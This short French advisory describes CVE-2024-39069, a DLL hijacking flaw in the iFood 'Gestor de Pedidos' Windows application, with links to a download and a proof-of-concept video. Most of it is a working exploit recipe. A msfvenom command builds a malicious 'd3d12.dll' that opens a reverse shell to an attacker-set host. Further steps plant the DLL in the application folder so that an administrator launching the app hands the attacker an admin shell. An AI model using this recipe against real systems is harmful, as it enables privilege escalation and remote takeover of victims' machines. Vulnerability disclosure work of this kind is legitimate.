
CVE-2024-39069
Un attaquant place une DLL malveillante nommée "d3d12.dll" dans un répertoire qui est parcouru par l'application avant que la DLL légitime "d3d12.dll" ne soit trouvée. Lorsque l'application est lancée, elle charge la DLL malveillante au lieu de la DLL légitime, permettant à l'attaquant d'exécuter du code arbitraire dans le contexte de l'application.
Page d'accueil du fournisseur : https://gestordepedidos.ifood.com.br/
Google Drive : https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
Vidéo POC : https://youtu.be/oMIobV2M0T8
Créer un fichier DLL malveillant sur Kali Linux avec msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
Transférer le fichier 'd3d12.dll' créé vers l'hôte Windows depuis Kali avec un accès utilisateur de bas niveau
Déplacer le fichier 'd3d12.dll' créé vers 'C:\Gestor de Peddios\d3d12.dll' avec un accès utilisateur de bas niveau
Lorsque l'administrateur exécute l'application, vous obtiendrez un shell inversé en tant qu'administrateur